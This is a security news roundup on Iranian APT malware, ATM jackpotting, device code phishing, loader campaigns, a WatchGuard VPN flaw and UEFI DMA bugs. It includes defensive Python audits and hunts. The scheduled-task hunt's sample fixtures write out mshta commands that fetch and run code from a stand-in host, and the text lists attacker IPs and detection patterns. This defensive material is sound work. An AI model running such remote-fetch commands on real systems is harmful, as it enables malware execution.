2025-12-22 AI Startup News

Iranian Infy APT Resurfaces with New Malware Activity After Years of Silence

Threat hunters have discerned new activity associated with an Iranian threat actor known as Infy (aka Prince of Persia), nearly five years after the hacking group was observed targeting victims in Sweden, the Netherlands, and Turkey. “The scale of Prince of Persia’s activity is more significant than we originally anticipated,” Tomer Bar, vice president of security research at SafeBreach, said in a technical breakdown shared with The Hacker News. “This threat group is still active, relevant, and dangerous.” Infy is one of the oldest advanced persistent threat (APT) actors in existence, with evidence of early activity dating all the way back to December 2004, according to a report released by Palo Alto Networks Unit 42 in May 2016 that was also authored by Bar, along with researcher Simon Conant. The group has also managed to remain elusive, attracting little attention, unlike other Iranian groups such as Charming Kitten, MuddyWater, and OilRig.

Attacks mounted by the group have prominently leveraged two strains of malware: a downloader and victim profiler named Foudre that delivers a second-stage implant called Tonnerre to extract data from high-value machines. It’s assessed that Foudre is distributed via phishing emails. The latest findings from SafeBreach have uncovered a covert campaign that has targeted victims across Iran, Iraq, Turkey, India, and Canada, as well as Europe, using updated versions of Foudre (version 34) and Tonnerre (versions 12-18, 50). The latest version of Tonnerre was detected in September 2025.

The attack chains have also witnessed a shift from a macro-laced Microsoft Excel file to embedding an executable within such documents to install Foudre. Perhaps the most notable aspect of the threat actor’s modus operandi is the use of a domain generation algorithm (DGA) to make its command-and-control (C2) infrastructure more resilient. In addition, Foudre and Tonnerre artifacts are known to validate if the C2 domain is authentic by downloading an RSA signature file, which the malware then decrypts using a public key and compares with a locally-stored validation file. SafeBreach’s analysis of the C2 infrastructure has also uncovered a directory named “key” that’s used for C2 validation, along with other folders to store communication logs and the exfiltrated files.

“Every day, Foudre downloads a dedicated signature file encrypted with an RSA private key by the threat actor and then uses RSA verification with an embedded public key to verify that this domain is an approved domain,” Bar said. “The request’s format is: ‘https:///key/.sig.'" Also present in the C2 server is a "download" directory whose current purpose is unknown. It is suspected that it's used to download and upgrade to a new version. The latest version of Tonnerre, on the other hand, includes a mechanism to contact a Telegram group (named "سرافراز," meaning "proudly" in Persian) through the C2 server.

The group has two members: a Telegram bot “@ttestro1bot” that’s likely used to issue commands and collect data, and a user with the handle “@ehsan8999100.” While the use of the messaging app for C2 is not uncommon, what’s notable is that the information about the Telegram group is stored in a file named “tga.adr” within a directory called “t” in the C2 server. It’s worth noting that the download of the “tga.adr” file can only be triggered for a specific list of victim GUIDs.

Also discovered by the cybersecurity company are other older variants used in Foudre campaigns between 2017 and 2020:

- A version of Foudre camouflaged as Amaq News Finder to download and execute the malware
- A new version of a trojan called MaxPinner that’s downloaded by Foudre version 24 DLL to spy on Telegram content
- A variation of malware called Deep Freeze, similar to Amaq News Finder, is used to infect victims with Foudre
- An unknown malware called Rugissement

“Despite the appearance of having gone dark in 2022, Prince of Persia threat actors have done quite the opposite,” SafeBreach said. “Our ongoing research campaign into this prolific and elusive group has highlighted critical details about their activities, C2 servers, and identified malware variants in the last three years.”

The disclosure comes as DomainTools’ continued analysis of Charming Kitten leaks has painted the picture of a hacking group that functions more like a government department, while running “espionage operations with clerical precision.” The threat actor has also been unmasked as behind the Moses Staff persona.

“APT 35, the same administrative machine that runs Tehran’s long-term credential-phishing operations, also ran the logistics that powered Moses Staff’s ransomware theatre,” the company said. “The supposed hacktivists and the government cyber-unit share not only tooling and targets but also the same accounts-payable system. The propaganda arm and the espionage arm are two products of a single workflow: different “projects” under the same internal ticketing regime.”

U.S. DOJ Charges 54 in ATM Jackpotting Scheme Using Ploutus Malware

The U.S. Department of Justice (DoJ) this week announced the indictment of 54 individuals in connection with a multi-million dollar ATM jackpotting scheme. The large-scale conspiracy involved deploying malware named Ploutus to hack into automated teller machines (ATMs) across the U.S. and force them to dispense cash.

The indicted members are alleged to be part of Tren de Aragua (TdA, Spanish for “the train of Aragua”), a Venezuelan gang designated a foreign terrorist organization by the U.S. State Department. In July 2025, the U.S. government announced sanctions against the group’s head, Hector Rusthenford Guerrero Flores (aka Niño Guerrero), and five other key members for their involvement in the “illicit drug trade, human smuggling and trafficking, extortion, sexual exploitation of women and children, and money laundering, among other criminal activities.” The Justice Department said an indictment returned on December 9, 2025, has charged a group of 22 people for supposedly committing bank fraud, burglary, and money laundering.

Prosecutors also alleged that TdA has leveraged jackpotting schemes to siphon millions of dollars in the U.S. and transfer the ill-gotten proceeds among its members and associates. Another 32 individuals have been charged in a second, related indictment returned on October 21, 2025, accusing them of “one count of conspiracy to commit bank fraud, one count of conspiracy to commit bank burglary and computer fraud, 18 counts of bank fraud, 18 counts of bank burglary, and 18 counts of damage to computers.” If convicted, the defendants could face a maximum penalty of anywhere between 20 and 335 years in prison. “These defendants employed methodical surveillance and burglary techniques to install malware into ATM machines, and then steal and launder money from the machines, in part to fund terrorism and the other far-reaching criminal activities of TDA, a designated Foreign Terrorist Organization,” said Acting Assistant Attorney General Matthew R. Galeotti of the Justice Department’s Criminal Division.

The jackpotting operation is said to have relied on the TdA recruiting an unspecified number of individuals to deploy the malware across the nation. These individuals would then conduct initial reconnaissance to assess external security measures installed at various ATMs and then attempt to open the ATM’s hood to check if they triggered any alarm or a law enforcement response. Following this step, the threat actors would install Ploutus by either replacing the hard drive with one that came preloaded with the malicious program or by connecting a removable thumb drive.

The malware is equipped to issue unauthorized commands associated with the Cash Dispensing Module of the ATM in order to force currency withdrawals. “The Ploutus malware was also designed to delete evidence of malware in an effort to conceal, create a false impression, mislead, or otherwise deceive employees of the banks and credit unions from learning about the deployment of the malware on the ATM,” the DoJ said. “Members of the conspiracy would then split the proceeds in predetermined portions.” Ploutus was first detected in Mexico in 2013. In a 2014 report, Symantec detailed how a weakness in Windows XP-based ATMs could be exploited to allow cybercriminals to withdraw cash simply by sending an SMS to compromised ATMs.

A subsequent analysis from FireEye (now part of Google Mandiant) in 2017 detailed its ability to control Diebold ATMs and run on various Windows versions. “Once deployed to an ATM, Ploutus-D makes it possible for a money mule to obtain thousands of dollars in minutes,” it explained at the time. “A money mule must have a master key to open the top portion of the ATM (or be able to pick it), a physical keyboard to connect to the machine, and an activation code (provided by the boss in charge of the operation) in order to dispense money from the ATM.” According to the agency, a total of 1,529 jackpotting incidents have been recorded in the U.S. since 2021, with about $40.73 million lost to the international criminal network as of August 2025.

“Many millions of dollars were drained from ATM machines across the United States as a result of this conspiracy, and that money is alleged to have gone to Tren de Aragua leaders to fund their terrorist activities and purposes,” U.S. Attorney Lesley Woods said.

Russia-Linked Hackers Use Microsoft 365 Device Code Phishing for Account Takeovers

A suspected Russia-aligned group has been attributed to a phishing campaign that employs device code authentication workflows to steal victims’ Microsoft 365 credentials and conduct account takeover attacks. The activity, ongoing since September 2025, is being tracked by Proofpoint under the moniker UNK_AcademicFlare. The attacks involve using compromised email addresses belonging to government and military organizations to strike entities within government, think tanks, higher education, and transportation sectors in the U.S. and Europe.

“Typically, these compromised email addresses are used to conduct benign outreach and rapport building related to the targets’ area of expertise to ultimately arrange a fictitious meeting or interview,” the enterprise security company said. As part of these efforts, the adversary claims to share a link to a document that includes questions or topics for the email recipient to review before the meeting. The URL points to a Cloudflare Worker URL that mimics the compromised sender’s Microsoft OneDrive account and instructs the victim to copy the provided code and click “Next” to access the supposed document. However, doing so redirects the user to the legitimate Microsoft device code login URL, where, once the previously provided code is entered, it causes the service to generate an access token that can then be recovered by the threat actors to take control of the victim account.

Device code phishing was documented in detail by both Microsoft and Volexity in February 2025, attributing the use of the attack method to Russia-aligned clusters such as Storm-2372, APT29, UTA0304, and UTA0307. Over the past couple of months, Amazon Threat Intelligence and Volexity have warned of continued attacks mounted by Russian threat actors that abuse the device code authentication flow. Proofpoint said UNK_AcademicFlare is likely a Russia-aligned threat actor given its targeting of Russia-focused specialists at multiple think tanks and Ukrainian government and energy sector organizations. Data from the company shows that multiple threat actors, both state-aligned and financially-motivated, have latched onto the phishing tactic to deceive users into giving them access to Microsoft 365 accounts.

This includes an e-crime group named TA2723 that has used salary-related lures in phishing emails to direct users to fake landing pages and trigger device code authorization. The October 2025 campaign is assessed to have been fueled by the ready availability of crimeware offerings like the Graphish phishing kit and red-team tools such as SquarePhish. “Similar to SquarePhish, the tool is designed to be user-friendly and does not require advanced technical expertise, lowering the barrier for entry and enabling even low-skilled threat actors to conduct sophisticated phishing campaigns,” Proofpoint said. “The ultimate objective is unauthorized access to sensitive personal or organizational data, which can be exploited for credential theft, account takeover, and further compromise.”

To counter the risk posed by device code phishing, the best option is to create a Conditional Access policy using the Authentication Flows condition to block device code flow for all users. If that’s not feasible, it’s advised to use a policy that uses an allow-list approach to allow device code authentication for approved users, operating systems, or IP ranges.
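Added example, not from the article or from Proofpoint: a Python audit of exported Conditional Access policies that reports whether device code flow is blocked for all users, blocked with an allow-list, or not actually enforced. Field names follow the Microsoft Graph conditionalAccessPolicy JSON shape as an assumption; the sample policies and placeholder IDs are constructed.

```python
"""Audit exported Conditional Access policies for device code flow coverage."""

# Exclusion lists that turn a block-all policy into an allow-list
# (approved users, operating systems, or IP ranges / named locations).
EXCLUSIONS = {
    "users": ("excludeUsers", "excludeGroups", "excludeRoles"),
    "platforms": ("excludePlatforms",),
    "locations": ("excludeLocations",),
}
RANK = ["none", "partial_scope", "not_enforced", "allow_list", "block_all"]


def targets_device_code(policy):
    """True if the Authentication Flows condition covers device code flow."""
    flows = (policy.get("conditions") or {}).get("authenticationFlows") or {}
    # Assumption: transferMethods is a comma-separated flags string.
    methods = {m.strip() for m in (flows.get("transferMethods") or "").split(",")}
    return "deviceCodeFlow" in methods


def classify(policy):
    """Return (verdict, exceptions) for a single policy."""
    cond = policy.get("conditions") or {}
    grant = policy.get("grantControls") or {}
    if not targets_device_code(policy) or "block" not in (grant.get("builtInControls") or []):
        return "none", {}
    scope_all = (
        "All" in ((cond.get("users") or {}).get("includeUsers") or [])
        and "All" in ((cond.get("applications") or {}).get("includeApplications") or [])
    )
    # An include list on platforms or locations narrows the block to a subset.
    for section, key in (("platforms", "includePlatforms"), ("locations", "includeLocations")):
        included = (cond.get(section) or {}).get(key) or []
        if included and not {"all", "All"} & set(included):
            scope_all = False
    if not scope_all:
        return "partial_scope", {}
    exceptions = {}
    for section, keys in EXCLUSIONS.items():
        for key in keys:
            values = (cond.get(section) or {}).get(key) or []
            if values:
                exceptions[key] = list(values)
    if policy.get("state") != "enabled":
        return "not_enforced", exceptions  # disabled or report-only
    return ("allow_list" if exceptions else "block_all"), exceptions


def audit(policies):
    """Report the strongest device code flow control found in the tenant export."""
    best = {"verdict": "none", "policy": None, "exceptions": {}}
    for policy in policies:
        verdict, exceptions = classify(policy)
        if RANK.index(verdict) > RANK.index(best["verdict"]):
            best = {"verdict": verdict, "policy": policy.get("displayName"),
                    "exceptions": exceptions}
    return best


# Constructed sample export; IDs are placeholders.
SAMPLE_POLICIES = [
    {   # report-only: evaluated and logged, but nothing is blocked
        "displayName": "Block device code flow (pilot)",
        "state": "enabledForReportingButNotEnforced",
        "conditions": {
            "users": {"includeUsers": ["All"]},
            "applications": {"includeApplications": ["All"]},
            "authenticationFlows": {"transferMethods": "deviceCodeFlow"},
        },
        "grantControls": {"operator": "OR", "builtInControls": ["block"]},
    },
    {   # enforced, with an allow-list for one group and one named location
        "displayName": "Block device code flow except approved",
        "state": "enabled",
        "conditions": {
            "users": {"includeUsers": ["All"], "excludeGroups": ["<approved-group-id>"]},
            "applications": {"includeApplications": ["All"]},
            "locations": {"includeLocations": ["All"],
                          "excludeLocations": ["<named-location-id>"]},
            "authenticationFlows": {"transferMethods": "deviceCodeFlow,authenticationTransfer"},
        },
        "grantControls": {"operator": "OR", "builtInControls": ["block"]},
    },
    {   # unrelated MFA policy: no Authentication Flows condition
        "displayName": "Require MFA for admins",
        "state": "enabled",
        "conditions": {"users": {"includeRoles": ["<role-id>"]},
                       "applications": {"includeApplications": ["All"]}},
        "grantControls": {"operator": "OR", "builtInControls": ["mfa"]},
    },
]

if __name__ == "__main__":
    print(audit(SAMPLE_POLICIES))
```

A `not_enforced` verdict is the case to watch for: a report-only policy shows up in the portal as a device code block but stops nothing.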

Cracked Software and YouTube Videos Spread CountLoader and GachiLoader Malware

Cybersecurity researchers have disclosed details of a new campaign that has used cracked software distribution sites as a distribution vector for a new version of a modular and stealthy loader known as CountLoader. The campaign “uses CountLoader as the initial tool in a multistage attack for access, evasion, and delivery of additional malware families,” Cyderes Howler Cell Threat Intelligence team said in an analysis. CountLoader was previously documented by both Fortinet and Silent Push, detailing the loader’s ability to push payloads like Cobalt Strike, AdaptixC2, PureHVNC RAT, Amatera Stealer, and PureMiner. The loader has been detected in the wild since at least June 2025.

The latest attack chain begins when unsuspecting users attempt to download cracked versions of legitimate software like Microsoft Word, which causes them to be redirected to a MediaFire link hosting a malicious ZIP archive, which contains an encrypted ZIP file and a Microsoft Word document with the password to open the second archive. Present within the ZIP file is a renamed legitimate Python interpreter (“Setup.exe”) that has been configured to execute a malicious command to retrieve CountLoader 3.2 from a remote server using “mshta.exe.” To establish persistence, the malware creates a scheduled task that mimics Google by using the name “GoogleTaskSystem136.0.7023.12” along with an identifier-like string. It’s configured to run every 30 minutes for 10 years by invoking “mshta.exe” with a fallback domain. It also checks if CrowdStrike’s Falcon security tool is installed on the host by querying the antivirus list via Windows Management Instrumentation (WMI).

If the service is detected, the persistence command is tweaked to “cmd.exe /c start /b mshta.exe ." Otherwise, it directly reaches out to the URL using "mshta.exe." CountLoader is equipped to profile the compromised host and fetch the next-stage payload. The newest version of the malware adds capabilities to propagate via removable USB drives and execute the malware directly in memory via "mshta.exe" or PowerShell. The complete list of supported features is as follows:

- Download an executable from a provided URL and execute it
- Download a ZIP archive from a provided URL and execute either a Python-based module or an EXE file present within it
- Download a DLL from a provided URL and run it via "rundll32.exe"
- Download an MSI installer package and install it
- Remove a scheduled task used by the loader
- Collect and exfiltrate extensive system information
- Spread via removable media by creating malicious shortcuts (LNK) next to their hidden original counterparts that, when launched, execute the original file and run the malware via "mshta.exe" with a C2 parameter
- Directly launch "mshta.exe" against a provided URL
- Execute a remote PowerShell payload in memory

In the attack chain observed by Cyderes, the final payload deployed by the CountLoader is an information stealer known as ACR Stealer, which is equipped to harvest sensitive data from infected hosts. "This campaign highlights CountLoader's ongoing evolution and increased sophistication, reinforcing the need for proactive detection and layered defense strategies," Cyderes said. “Its ability to deliver ACR Stealer through a multi-stage process starting from Python library tampering to in-memory shellcode unpacking highlights a growing trend of signed binary abuse and fileless execution tactics.”

YouTube Ghost Network Delivers GachiLoader

The disclosure comes as Check Point disclosed details of a new, heavily obfuscated JavaScript malware loader dubbed GachiLoader that’s written in Node.js. The malware is distributed by means of the YouTube Ghost Network, a network of compromised YouTube accounts that engage in malware distribution. “One variant of GachiLoader deploys a second-stage malware, Kidkadi, that implements a novel technique for Portable Executable (PE) injection,” security researchers Sven Rath and Jaromír Hořejší said. “This technique loads a legitimate DLL and abuses Vectored Exception Handling to replace it on-the-fly with a malicious payload.” As many as 100 YouTube videos have been flagged as part of the campaign, amassing approximately 220,000 views.

These videos were uploaded from 39 compromised accounts, with the first video dating back to December 22, 2024. A majority of these videos have since been taken down by Google. In at least one case, GachiLoader has served as a conduit for the Rhadamanthys information stealer malware. Like other loaders, GachiLoader is used to deploy additional payloads to an infected machine, while simultaneously performing a series of anti-analysis checks to fly under the radar.

It also verifies if it’s running in an elevated context by executing the “net session” command. In the event the execution fails, it attempts to start itself with admin privileges, which, in turn, triggers a User Account Control (UAC) prompt. There are high chances that the victim will allow it to continue, as the malware is likely to be distributed through fake installers for popular software, as outlined in the case of CountLoader. In the last phase, the malware attempts to kill “SecHealthUI.exe,” a process associated with Microsoft Defender, and configures Defender exclusions to avoid the security solution from flagging malicious payloads staged in certain folders (e.g., C:\Users\, C:\ProgramData\, and C:\Windows).

GachiLoader then proceeds to either directly fetch the final payload from a remote URL or employ another loader named “kidkadi.node,” which then loads the main malware by abusing Vectored Exception Handling. “The threat actor behind GachiLoader demonstrated proficiency with Windows internals, coming up with a new variation of a known technique,” Check Point said. “This highlights the need for security researchers to stay up-to-date with malware techniques such as PE injections and to proactively look for new ways in which malware authors try to evade detection.”
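Added example for the CountLoader persistence described earlier in this article (a Google-lookalike scheduled task that runs “mshta.exe” every 30 minutes, or “cmd.exe /c start /b mshta.exe” when Falcon is present), not code from Cyderes or Check Point: a Python hunt over exported scheduled-task XML. The task XML, the `example.invalid` URL, the `-falcon` name suffix and the vendor-prefix list are constructed for illustration.

```python
import re
import xml.etree.ElementTree as ET

# Namespace used by Task Scheduler XML exports (schtasks /query /xml).
NS = {"t": "http://schemas.microsoft.com/windows/2004/02/mit/task"}
VENDOR_PREFIX = re.compile(r"^(google|microsoft|adobe|mozilla)", re.I)  # hypothetical list
SHORT_REPEAT = re.compile(r"^PT(\d+)M$")  # e.g. PT30M = every 30 minutes


def _text(root, path):
    node = root.find(path, NS)
    return (node.text or "").strip() if node is not None else ""


def score_task(name, xml_text):
    """Return the reasons a task looks like mshta-based persistence ([] if none)."""
    # Exports carry a UTF-16 declaration; drop it before parsing a str.
    root = ET.fromstring(re.sub(r"^\s*<\?xml[^>]*\?>", "", xml_text))
    command = _text(root, "t:Actions/t:Exec/t:Command")
    arguments = _text(root, "t:Actions/t:Exec/t:Arguments").lower()
    interval = _text(root, "t:Triggers/*/t:Repetition/t:Interval")
    exe = re.split(r"[\\/]", command.strip('"'))[-1].lower()

    reasons = []
    if exe == "mshta.exe" and re.search(r"https?://", arguments):
        reasons.append("mshta_remote_url")
    elif exe == "cmd.exe" and "mshta" in arguments:
        reasons.append("mshta_via_cmd")  # the variant used when Falcon is detected
    if not reasons:
        return []  # without an mshta action the other signals are too noisy
    match = SHORT_REPEAT.match(interval)
    if match and int(match.group(1)) <= 60:
        reasons.append("repeats_every_%s_min" % match.group(1))
    if VENDOR_PREFIX.match(name):
        reasons.append("vendor_lookalike_name")
    return reasons


def hunt(tasks):
    """Map task name -> reasons for every task that scores as suspicious."""
    flagged = {}
    for name, xml_text in tasks.items():
        reasons = score_task(name, xml_text)
        if reasons:
            flagged[name] = reasons
    return flagged


def build_task_xml(command, arguments, interval):
    """Constructed sample in the Task Scheduler export schema (trimmed)."""
    return (
        '<?xml version="1.0" encoding="UTF-16"?>\n'
        '<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">'
        "<Triggers><TimeTrigger><Repetition><Interval>{i}</Interval></Repetition>"
        "<StartBoundary>2025-12-01T09:00:00</StartBoundary></TimeTrigger></Triggers>"
        "<Actions><Exec><Command>{c}</Command><Arguments>{a}</Arguments></Exec></Actions>"
        "</Task>"
    ).format(i=interval, c=command, a=arguments)


# Constructed tasks: two shaped like the persistence above, one benign updater.
SAMPLE_TASKS = {
    "GoogleTaskSystem136.0.7023.12": build_task_xml(
        "mshta.exe", "https://fallback.example.invalid/", "PT30M"),
    "GoogleTaskSystem136.0.7023.12-falcon": build_task_xml(
        "cmd.exe", "/c start /b mshta.exe https://fallback.example.invalid/", "PT30M"),
    "GoogleUpdateTaskMachineUA": build_task_xml(
        r"C:\Program Files (x86)\Google\Update\GoogleUpdate.exe",
        "/ua /installsource scheduler", "PT1H"),
}

if __name__ == "__main__":
    for task, why in hunt(SAMPLE_TASKS).items():
        print(task, why)
```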

WatchGuard Warns of Active Exploitation of Critical Fireware OS VPN Vulnerability

WatchGuard has released fixes to address a critical security flaw in Fireware OS that it said has been exploited in real-world attacks. Tracked as CVE-2025-14733 (CVSS score: 9.3), the vulnerability has been described as a case of out-of-bounds write affecting the iked process that could allow a remote unauthenticated attacker to execute arbitrary code. “This vulnerability affects both the mobile user VPN with IKEv2 and the branch office VPN using IKEv2 when configured with a dynamic gateway peer,” the company said in a Thursday advisory. “If the Firebox was previously configured with the mobile user VPN with IKEv2 or a branch office VPN using IKEv2 to a dynamic gateway peer, and both of those configurations have since been deleted, that Firebox may still be vulnerable if a branch office VPN to a static gateway peer is still configured.”

The vulnerability impacts the following versions of Fireware OS:

- 2025.1 - Fixed in 2025.1.4
- 12.x - Fixed in 12.11.6
- 12.5.x (T15 & T35 models) - Fixed in 12.5.15
- 12.3.1 (FIPS-certified release) - Fixed in 12.3.1_Update4 (B728352)
- 11.x (11.10.2 up to and including 11.12.4_Update1) - End-of-Life

WatchGuard acknowledged that it has observed threat actors actively attempting to exploit this vulnerability in the wild, with the attacks originating from the following IP addresses:

- 45.95.19[.]50
- 51.15.17[.]89
- 172.93.107[.]67
- 199.247.7[.]82

Interestingly, the IP address “199.247.7[.]82” was also flagged by Arctic Wolf earlier this week as linked to the exploitation of two recently disclosed security vulnerabilities in Fortinet FortiOS, FortiWeb, FortiProxy, and FortiSwitchManager (CVE-2025-59718 and CVE-2025-59719, CVSS scores: 9.8).

The Seattle-based company has also shared multiple indicators of compromise (IoCs) that device owners can use to determine if their own instances have been infected:

- A log message stating “Received peer certificate chain is longer than 8. Reject this certificate chain” when the Firebox receives an IKE2 Auth payload with more than 8 certificates
- An IKE_AUTH request log message with an abnormally large CERT payload size (greater than 2000 bytes)
- During a successful exploit, the iked process will hang, interrupting VPN connections
- After a failed or successful exploit, the IKED process will crash and generate a fault report on the Firebox

The disclosure comes a little over a month after the U.S. Cybersecurity and Infrastructure Security Agency (CISA) added another critical WatchGuard Fireware OS flaw (CVE-2025-9242, CVSS score: 9.3) to its Known Exploited Vulnerabilities (KEV) catalog after reports of active exploitation. It’s currently not known if these two sets of attacks are related.

Users are advised to apply the updates as soon as possible to secure against the threat. As temporary mitigation for devices with vulnerable Branch Office VPN (BOVPN) configurations, the company has urged administrators to disable dynamic peer BOVPNs, create an alias that includes the static IP addresses of remote BOVPN peers, add new firewall policies that allow access from the alias, and disable the default built-in policies that handle VPN traffic.
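Added example, not WatchGuard's code: a Python scan of exported Firebox log lines for the two log-based indicators and the source addresses listed in this article. The log lines are constructed, and the `CERT(sz=N)` rendering of payload sizes is an assumption about the log format, so adjust the pattern to what your device actually writes.

```python
import re

# Log-based indicators quoted in the article.
CHAIN_MSG = "Received peer certificate chain is longer than 8"
CERT_LIMIT = 2000  # bytes; a larger CERT payload in IKE_AUTH is abnormal

# Source addresses from the article, stored defanged and refanged for matching.
DEFANGED_SOURCES = ["45.95.19[.]50", "51.15.17[.]89", "172.93.107[.]67", "199.247.7[.]82"]
KNOWN_SOURCES = {ip.replace("[.]", ".") for ip in DEFANGED_SOURCES}

# ASSUMPTION: payload sizes appear as NAME(sz=N) on the IKE_AUTH request line.
CERT_SIZE = re.compile(r"\bCERT\(sz=(\d+)\)")
IPV4 = re.compile(r"\b(?:\d{1,3}\.){3}\d{1,3}\b")


def scan(lines):
    """Return one finding per log line that matches any indicator."""
    hits = []
    for lineno, line in enumerate(lines, 1):
        reasons = []
        if CHAIN_MSG in line:
            reasons.append("cert_chain_too_long")
        if "IKE_AUTH request" in line:
            sizes = [int(n) for n in CERT_SIZE.findall(line)]
            if any(n > CERT_LIMIT for n in sizes):
                reasons.append("oversized_cert_payload")
        peers = sorted(set(IPV4.findall(line)) & KNOWN_SOURCES)
        if peers:
            reasons.append("listed_source_ip")
        if reasons:
            hits.append({"line": lineno, "reasons": reasons, "listed_peers": peers})
    return hits


# Constructed log lines (format is illustrative, not copied from a device).
SAMPLE_LOG = [
    '2025-12-19 10:02:11 iked (198.51.100.7<->203.0.113.10) "IKE_AUTH request" '
    "message has 4 payloads [ IDi(sz=12) CERT(sz=1180) AUTH(sz=264) SA(sz=44) ]",
    '2025-12-19 10:05:42 iked (199.247.7.82<->203.0.113.10) "IKE_AUTH request" '
    "message has 4 payloads [ IDi(sz=12) CERT(sz=3000) AUTH(sz=264) SA(sz=44) ]",
    "2025-12-19 10:05:42 iked Received peer certificate chain is longer than 8. "
    "Reject this certificate chain",
    "2025-12-19 10:09:00 iked (198.51.100.7<->203.0.113.10) IKE SA established",
]

if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG):
        print(hit)
```

A hit is a reason to check for an iked fault report and to confirm the firmware version, not proof of compromise on its own.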

Nigeria Arrests RaccoonO365 Phishing Developer Linked to Microsoft 365 Attacks

Authorities in Nigeria have announced the arrest of three “high-profile internet fraud suspects” who are alleged to have been involved in phishing attacks targeting major corporations, including the main developer behind the RaccoonO365 phishing-as-a-service (PhaaS) scheme. The Nigeria Police Force National Cybercrime Centre (NPF–NCCC) said investigations conducted in collaboration with Microsoft and the Federal Bureau of Investigation (FBI) led to the identification of Okitipi Samuel, also known as Moses Felix, as the principal suspect and developer of the phishing infrastructure. “Investigations reveal that he operated a Telegram channel through which phishing links were sold in exchange for cryptocurrency and hosted fraudulent login portals on Cloudflare using stolen or fraudulently obtained email credentials,” the NPF said in a post shared on social media. In addition, laptops, mobile devices, and other digital equipment linked to the operation have been seized following search operations conducted at their residences.

The two other arrested individuals have no connection to the creation or operation of the PhaaS service, per the NPF. The arrests were carried out following raids in Lagos and Edo states. RaccoonO365 is the name assigned to a financially motivated threat group behind a PhaaS toolkit that enables bad actors to conduct credential harvesting attacks by serving phishing pages mimicking Microsoft 365 login pages. Microsoft is tracking the threat actor under the moniker Storm-2246.

Back in September 2025, the tech giant said it worked with Cloudflare to seize 338 domains used by RaccoonO365. The phishing infrastructure attributed to the toolkit is estimated to have led to the theft of at least 5,000 Microsoft credentials from 94 countries since July 2024. The NPF said RaccoonO365 was used to set up fraudulent Microsoft login portals aimed at stealing user credentials and using them to gain unlawful access to the email platforms of corporate, financial, and educational institutions. The joint probe has uncovered multiple incidents of unauthorized Microsoft 365 account access between January and September 2025 that originated from phishing messages crafted to mimic legitimate Microsoft authentication pages.

These activities led to business email compromise, data breaches, and financial losses across multiple jurisdictions, the NPF added. A civil lawsuit filed by Microsoft and Health-ISAC in September has accused defendants Joshua Ogundipe and four other John Does of hosting a cybercriminal operation by “selling, distributing, purchasing, and implementing” the phishing kit to facilitate sophisticated spear-phishing and siphon sensitive information. The stolen data is then used to fuel more cybercrimes, including business email compromise, financial fraud, and ransomware attacks, as well as commit intellectual property violations, the lawsuit alleged. The lawsuit also identified Ogundipe as the mastermind behind the operation.

His present whereabouts are unclear. When reached for comment, a Microsoft spokesperson told The Hacker News that investigations are ongoing. The development comes as Google filed a lawsuit against the operators of the Darcula PhaaS service, naming Chinese national Yucheng Chang as the group’s leader along with 24 other members. The company is seeking a court order to seize the group’s server infrastructure that has been behind a massive smishing wave impersonating U.S. government entities.

Darcula and associates are estimated to have stolen nearly 900,000 credit card numbers, including nearly 40,000 from Americans, according to an investigation from the Norwegian Broadcasting Corporation (NRK) and cybersecurity company Mnemonic. The Chinese-language phishing kit first emerged in July 2023. News of the lawsuit was first reported by NBC News on December 17, 2025.

The development comes a little over a month after Google also sued China-based hackers associated with another PhaaS service known as Lighthouse that’s believed to have impacted over 1 million users across 120 countries.

New UEFI Flaw Enables Early-Boot DMA Attacks on ASRock, ASUS, GIGABYTE, MSI Motherboards

Certain motherboard models from vendors like ASRock, ASUSTeK Computer, GIGABYTE, and MSI are affected by a security vulnerability that leaves them susceptible to early-boot direct memory access (DMA) attacks across architectures that implement a Unified Extensible Firmware Interface (UEFI) and input–output memory management unit (IOMMU). UEFI and IOMMU are designed to enforce a security foundation and prevent peripherals from performing unauthorized memory accesses, effectively ensuring that DMA-capable devices cannot manipulate or inspect system memory before the operating system is loaded. The vulnerability, discovered by Nick Peterson and Mohamed Al-Sharifi of Riot Games in certain UEFI implementations, has to do with a discrepancy in the DMA protection status. While the firmware indicates that DMA protection is active, it fails to configure and enable the IOMMU during the critical boot phase.

“This gap allows a malicious DMA-capable Peripheral Component Interconnect Express (PCIe) device with physical access to read or modify system memory before operating system-level safeguards are established,” the CERT Coordination Center (CERT/CC) said in an advisory. “As a result, attackers could potentially access sensitive data in memory or influence the initial state of the system, thus undermining the integrity of the boot process.” Successful exploitation of the vulnerability could allow a physically present attacker to enable pre-boot code injection on affected systems running unpatched firmware and access or alter system memory via DMA transactions, much before the operating system kernel and its security features are loaded.

The vulnerabilities that enable a bypass of early-boot memory protection are listed below:

- CVE-2025-14304 (CVSS score: 7.0) - A protection mechanism failure vulnerability affecting ASRock, ASRock Rack, and ASRock Industrial motherboards using Intel 500, 600, 700, and 800 series chipsets
- CVE-2025-11901 (CVSS score: 7.0) - A protection mechanism failure vulnerability affecting ASUS motherboards using Intel Z490, W480, B460, H410, Z590, B560, H510, Z690, B660, W680, Z790, B760, and W790 series chipsets
- CVE-2025-14302 (CVSS score: 7.0) - A protection mechanism failure vulnerability affecting GIGABYTE motherboards using Intel Z890, W880, Q870, B860, H810, Z790, B760, Z690, Q670, B660, H610, W790 series chipsets, and AMD X870E, X870, B850, B840, X670, B650, A620, A620A, and TRX50 series chipsets (Fix for TRX50 planned for Q1 2026)
- CVE-2025-14303 (CVSS score: 7.0) - A protection mechanism failure vulnerability affecting MSI motherboards using Intel 600 and 700 series chipsets

With impacted vendors releasing firmware updates to correct the IOMMU initialization sequence and enforce DMA protections throughout the boot process, it’s essential that end users and administrators apply them as soon as they are available to stay protected against the threat. “In environments where physical access cannot be fully controlled or relied on, prompt patching and adherence to hardware security best practices are especially important,” CERT/CC said.

“Because the IOMMU also plays a foundational role in isolation and trust delegation in virtualized and cloud environments, this flaw highlights the importance of ensuring correct firmware configuration even on systems not typically used in data centers.”

Update

